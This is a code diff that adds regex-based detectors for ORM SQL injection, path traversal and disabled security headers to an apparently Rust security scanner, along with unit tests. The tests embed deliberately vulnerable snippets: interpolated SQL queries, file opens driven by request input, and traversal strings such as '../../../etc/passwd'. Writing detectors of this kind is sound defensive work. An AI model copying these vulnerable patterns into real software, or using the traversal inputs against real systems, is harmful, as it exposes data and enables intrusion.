line_num,
|
||||
m.as_str(),
|
||||
"django",
|
||||
"Django .extra() with interpolation (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
// SQLAlchemy text
|
||||
if let Some(m) = self.sqlalchemy_text.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"sqlalchemy",
|
||||
"SQLAlchemy text() with interpolation (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
// SQLAlchemy execute
|
||||
if let Some(m) = self.sqlalchemy_exec.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"sqlalchemy",
|
||||
"SQLAlchemy execute() with f-string (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
// Sequelize raw query
|
||||
if let Some(m) = self.sequelize_raw.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"sequelize",
|
||||
"Sequelize raw query with template literal (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
// TypeORM where
|
||||
if let Some(m) = self.typeorm_where.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"typeorm",
|
||||
"TypeORM where() with template literal (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
// Prisma queryRawUnsafe
|
||||
if let Some(m) = self.prisma_raw.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"prisma",
|
||||
"Prisma $queryRawUnsafe with interpolation (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
// GORM Raw
|
||||
if let Some(m) = self.gorm_raw.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"gorm",
|
||||
"GORM Raw() with fmt.Sprintf (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_django_raw_fstring() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
users = User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("db/orm/query"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_django_raw_format() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
users = User.objects.raw("SELECT * FROM users WHERE id = {}".format(user_id))
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
|
||||
|
||||
// This matches the django_raw pattern (has {} and .format)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sqlalchemy_text() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
result = session.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("SQLAlchemy"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sqlalchemy_execute_fstring() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
conn.execute(f"UPDATE users SET name = '{name}' WHERE id = {id}")
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sequelize_raw() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
const users = await sequelize.query(`SELECT * FROM users WHERE id = ${userId}`);
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "db.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Sequelize"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_typeorm_where() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
const user = await userRepo.createQueryBuilder("user")
|
||||
.where(`user.id = ${userId}`)
|
||||
.getOne();
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["ts".to_string()], content, Language::TypeScript, "user.ts");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_gorm_raw() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
db.Raw(fmt.Sprintf("SELECT * FROM users WHERE id = %d", userID)).Scan(&user)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "repo.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("GORM"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_prisma_query_raw_unsafe() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
let content = r#"
|
||||
const users = await prisma.$queryRawUnsafe(`SELECT * FROM users WHERE id = ${userId}`);
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["ts".to_string()], content, Language::TypeScript, "db.ts");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Prisma"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_parameterized() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
// Safe: parameterized query - no f-string, no .format(), just %s placeholder
|
||||
let content = r#"
|
||||
users = User.objects.raw("SELECT * FROM users WHERE id = ?", [user_id])
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_orm_filter() {
|
||||
let extractor = OrmInjectionExtractor::new();
|
||||
// Safe: using ORM filter methods
|
||||
let content = r#"
|
||||
users = User.objects.filter(id=user_id)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
348
applications/aphoria/src/extractors/path_traversal.rs
Normal file
348
applications/aphoria/src/extractors/path_traversal.rs
Normal file
@ -0,0 +1,348 @@
|
||||
//! Path traversal vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where file system operations use user-controlled input
|
||||
//! without proper validation, which can lead to directory traversal attacks.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for path traversal vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe file path handling:
|
||||
/// - File operations with user-controlled input
|
||||
/// - Path.join/filepath.Join with request parameters
|
||||
/// - sendFile/res.download with user input
|
||||
/// - Direct traversal literals (../ or %2e%2e)
|
||||
pub struct PathTraversalExtractor {
|
||||
// Python patterns
|
||||
python_open_user: Regex,
|
||||
python_path_join: Regex,
|
||||
|
||||
// JavaScript/TypeScript patterns
|
||||
js_fs_user: Regex,
|
||||
js_path_join: Regex,
|
||||
js_sendfile: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_filepath: Regex,
|
||||
|
||||
// Rust patterns
|
||||
rust_path_user: Regex,
|
||||
|
||||
// Universal patterns
|
||||
traversal_literal: Regex,
|
||||
}
|
||||
|
||||
impl Default for PathTraversalExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl PathTraversalExtractor {
|
||||
/// Create a new path traversal extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: file ops with user input
|
||||
python_open_user: Regex::new(
|
||||
r#"(?:open|read|write)\s*\([^)]*(?:request\.|params\[|input|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_path_join: Regex::new(
|
||||
r#"os\.path\.join\s*\([^)]*(?:request\.|params\[|input|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: fs/path with user input
|
||||
js_fs_user: Regex::new(
|
||||
r#"fs\.(?:readFile|writeFile|createReadStream|readFileSync|writeFileSync)\s*\([^)]*(?:req\.|params\.|query\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_path_join: Regex::new(
|
||||
r#"path\.(?:join|resolve)\s*\([^)]*(?:req\.|params\.|query\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_sendfile: Regex::new(r#"res\.(?:sendFile|download)\s*\([^)]*(?:req\.|params\.)"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: filepath with user input
|
||||
go_filepath: Regex::new(
|
||||
r#"(?:filepath\.Join|os\.Open|os\.ReadFile|ioutil\.ReadFile)\s*\([^)]*(?:r\.|req\.|c\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Rust: path operations with user input
|
||||
rust_path_user: Regex::new(
|
||||
r#"(?:Path::new|PathBuf::from|std::fs::read|std::fs::write)\s*\([^)]*(?:request|params|query|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Universal: direct traversal literals
|
||||
traversal_literal: Regex::new(r#"\.\.[\\/]|%2e%2e|%2E%2E"#).expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["filesystem", "path", category],
|
||||
"user_controlled_path",
|
||||
ObjectValue::Boolean(true),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.85,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for PathTraversalExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"path_traversal"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for traversal literals in any language
|
||||
if let Some(m) = self.traversal_literal.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"traversal",
|
||||
"Path contains directory traversal sequence (../)",
|
||||
));
|
||||
}
|
||||
|
||||
// Language-specific patterns
|
||||
match language {
|
||||
Language::Python => {
|
||||
if let Some(m) = self.python_open_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"File operation with user-controlled path (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_path_join.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"path_construction",
|
||||
"os.path.join with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
if let Some(m) = self.js_fs_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"fs operation with user-controlled path (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_path_join.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"path_construction",
|
||||
"path.join/resolve with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_sendfile.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_serving",
|
||||
"res.sendFile with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
if let Some(m) = self.go_filepath.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"Filepath operation with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Rust => {
|
||||
if let Some(m) = self.rust_path_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"Path operation with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_open_user_input() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
file = open(request.GET['filename'], 'r')
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("filesystem/path"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_path_join() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path = os.path.join(base_dir, request.args['file'])
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_fs_read() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
fs.readFileSync(req.query.file);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_sendfile() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
res.sendFile(req.params.filename);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_filepath() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path := filepath.Join(baseDir, r.URL.Query().Get("file"))
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_traversal_literal() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path := "../../../etc/passwd"
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("traversal sequence"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_encoded_traversal() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
url := "%2e%2e%2fconfig"
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_safe_path() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
// Safe: no user input
|
||||
let content = r#"
|
||||
fs.readFileSync('./config.json');
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
@ -13,9 +13,14 @@ use super::dep_versions::DepVersionsExtractor;
|
||||
use super::hardcoded_secrets::HardcodedSecretsExtractor;
|
||||
use super::high_entropy::HighEntropySecretsExtractor;
|
||||
use super::insecure_cookies::InsecureCookiesExtractor;
|
||||
use super::insecure_deserialization::InsecureDeserializationExtractor;
|
||||
use super::jwt_config::JwtConfigExtractor;
|
||||
use super::orm_injection::OrmInjectionExtractor;
|
||||
use super::path_traversal::PathTraversalExtractor;
|
||||
use super::rate_limit::RateLimitExtractor;
|
||||
use super::security_headers::SecurityHeadersExtractor;
|
||||
use super::sql_injection::SqlInjectionExtractor;
|
||||
use super::ssrf::SsrfExtractor;
|
||||
use super::timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
|
||||
use super::tls_verify::TlsVerifyExtractor;
|
||||
use super::tls_version::TlsVersionExtractor;
|
||||
@ -23,7 +28,10 @@ use super::traits::Extractor;
|
||||
use super::unreal_config::UnrealConfigExtractor;
|
||||
use super::unreal_cpp::UnrealCppExtractor;
|
||||
use super::unreal_performance::UnrealPerformanceExtractor;
|
||||
use super::unvalidated_redirects::UnvalidatedRedirectsExtractor;
|
||||
use super::weak_crypto::WeakCryptoExtractor;
|
||||
use super::weak_password::WeakPasswordExtractor;
|
||||
use super::xxe::XxeExtractor;
|
||||
|
||||
/// Registry of available extractors.
|
||||
pub struct ExtractorRegistry {
|
||||
@ -116,6 +124,31 @@ impl ExtractorRegistry {
|
||||
if is_enabled("insecure_cookies") {
|
||||
extractors.push(Box::new(InsecureCookiesExtractor::new()));
|
||||
}
|
||||
// Phase 8: Enterprise security extractors
|
||||
if is_enabled("path_traversal") {
|
||||
extractors.push(Box::new(PathTraversalExtractor::new()));
|
||||
}
|
||||
if is_enabled("unvalidated_redirects") {
|
||||
extractors.push(Box::new(UnvalidatedRedirectsExtractor::new()));
|
||||
}
|
||||
if is_enabled("weak_password") {
|
||||
extractors.push(Box::new(WeakPasswordExtractor::new()));
|
||||
}
|
||||
if is_enabled("security_headers") {
|
||||
extractors.push(Box::new(SecurityHeadersExtractor::new()));
|
||||
}
|
||||
if is_enabled("insecure_deserialization") {
|
||||
extractors.push(Box::new(InsecureDeserializationExtractor::new()));
|
||||
}
|
||||
if is_enabled("ssrf") {
|
||||
extractors.push(Box::new(SsrfExtractor::new()));
|
||||
}
|
||||
if is_enabled("orm_injection") {
|
||||
extractors.push(Box::new(OrmInjectionExtractor::new()));
|
||||
}
|
||||
if is_enabled("xxe") {
|
||||
extractors.push(Box::new(XxeExtractor::new()));
|
||||
}
|
||||
|
||||
// Register declarative extractors from config
|
||||
// Declarative extractors are always enabled unless explicitly disabled.
|
||||
@ -199,7 +232,7 @@ mod tests {
|
||||
use crate::extractors::declarative::{DeclarativeClaimDef, DeclarativeValue};
|
||||
|
||||
/// Number of built-in extractors (not counting declarative).
|
||||
const BUILTIN_EXTRACTOR_COUNT: usize = 17;
|
||||
const BUILTIN_EXTRACTOR_COUNT: usize = 25;
|
||||
|
||||
#[test]
|
||||
fn test_registry_creation() {
|
||||
|
||||
359
applications/aphoria/src/extractors/security_headers.rs
Normal file
359
applications/aphoria/src/extractors/security_headers.rs
Normal file
@ -0,0 +1,359 @@
|
||||
//! Missing security headers extractor.
|
||||
//!
|
||||
//! Detects patterns where security headers are explicitly disabled or
|
||||
//! configured insecurely.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for missing or disabled security headers.
|
||||
///
|
||||
/// Detects patterns indicating insecure header configurations:
|
||||
/// - X-Frame-Options disabled or set to ALLOWALL
|
||||
/// - X-Content-Type-Options disabled
|
||||
/// - X-XSS-Protection disabled
|
||||
/// - HSTS disabled
|
||||
/// - Content-Security-Policy disabled
|
||||
pub struct SecurityHeadersExtractor {
|
||||
// Explicit header disabled
|
||||
header_disabled: Regex,
|
||||
|
||||
// Django missing secure settings
|
||||
django_missing: Regex,
|
||||
|
||||
// YAML headers disabled
|
||||
yaml_disabled: Regex,
|
||||
|
||||
// Frame options ALLOWALL
|
||||
frame_allowall: Regex,
|
||||
|
||||
// CSP disabled or unsafe
|
||||
csp_unsafe: Regex,
|
||||
|
||||
// HSTS disabled
|
||||
hsts_disabled: Regex,
|
||||
}
|
||||
|
||||
impl Default for SecurityHeadersExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecurityHeadersExtractor {
|
||||
/// Create a new security headers extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Explicit header disabled in various formats
|
||||
header_disabled: Regex::new(
|
||||
r#"(?i)(?:X-Frame-Options|X-Content-Type-Options|X-XSS-Protection)\s*[:=]\s*["']?(?:none|disabled?|false|off)["']?"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Django missing secure settings
|
||||
django_missing: Regex::new(
|
||||
r#"(?i)SECURE_(?:BROWSER_XSS_FILTER|CONTENT_TYPE_NOSNIFF|HSTS_SECONDS|SSL_REDIRECT)\s*=\s*(?:False|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// YAML headers disabled
|
||||
yaml_disabled: Regex::new(
|
||||
r#"(?i)(?:x_frame_options|xss_protection|content_type_nosniff|hsts)\s*:\s*(?:false|no|disabled?|off)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Frame options ALLOWALL (dangerous)
|
||||
frame_allowall: Regex::new(r#"(?i)X-Frame-Options\s*[:=]\s*["']?ALLOWALL"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// CSP disabled or using unsafe-inline/unsafe-eval
|
||||
csp_unsafe: Regex::new(
|
||||
r#"(?i)(?:Content-Security-Policy|CSP)\s*[:=]\s*["']?(?:none|disabled?|.*unsafe-(?:inline|eval))"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// HSTS disabled or set to 0
|
||||
hsts_disabled: Regex::new(
|
||||
r#"(?i)(?:Strict-Transport-Security|HSTS|hsts_seconds)\s*[:=]\s*(?:["']?(?:none|disabled?|false|off)["']?|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
header: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["http", "security_headers", header],
|
||||
"header_status",
|
||||
ObjectValue::Text("disabled".to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.8,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for SecurityHeadersExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"security_headers"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Yaml,
|
||||
Language::Json,
|
||||
Language::Toml,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
_language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for explicitly disabled headers
|
||||
if let Some(m) = self.header_disabled.find(line) {
|
||||
let header = if line.to_lowercase().contains("frame") {
|
||||
"x_frame_options"
|
||||
} else if line.to_lowercase().contains("content-type") {
|
||||
"x_content_type_options"
|
||||
} else {
|
||||
"x_xss_protection"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
header,
|
||||
"Security header explicitly disabled",
|
||||
));
|
||||
}
|
||||
|
||||
// Check Django secure settings
|
||||
if let Some(m) = self.django_missing.find(line) {
|
||||
let header = if line.to_lowercase().contains("xss") {
|
||||
"x_xss_protection"
|
||||
} else if line.to_lowercase().contains("nosniff") {
|
||||
"x_content_type_options"
|
||||
} else if line.to_lowercase().contains("hsts") {
|
||||
"hsts"
|
||||
} else {
|
||||
"ssl_redirect"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
header,
|
||||
"Django security setting disabled",
|
||||
));
|
||||
}
|
||||
|
||||
// Check YAML disabled patterns
|
||||
if let Some(m) = self.yaml_disabled.find(line) {
|
||||
let header = if line.to_lowercase().contains("frame") {
|
||||
"x_frame_options"
|
||||
} else if line.to_lowercase().contains("xss") {
|
||||
"x_xss_protection"
|
||||
} else if line.to_lowercase().contains("nosniff") {
|
||||
"x_content_type_options"
|
||||
} else {
|
||||
"hsts"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
header,
|
||||
"Security header disabled in configuration",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for dangerous X-Frame-Options ALLOWALL
|
||||
if let Some(m) = self.frame_allowall.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"x_frame_options",
|
||||
"X-Frame-Options set to ALLOWALL (clickjacking risk)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for CSP unsafe patterns
|
||||
if let Some(m) = self.csp_unsafe.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"content_security_policy",
|
||||
"Content-Security-Policy disabled or uses unsafe directives",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for HSTS disabled
|
||||
if let Some(m) = self.hsts_disabled.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"hsts",
|
||||
"Strict-Transport-Security (HSTS) disabled",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_header_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
X-Frame-Options: none
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "nginx.conf");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("security_headers"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_django_missing() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
SECURE_BROWSER_XSS_FILTER = False
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Django"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
x_frame_options: false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_frame_allowall() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
X-Frame-Options = "ALLOWALL"
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("clickjacking"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_csp_unsafe() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
Content-Security-Policy: script-src 'unsafe-inline'
|
||||
"#;
|
||||
|
||||
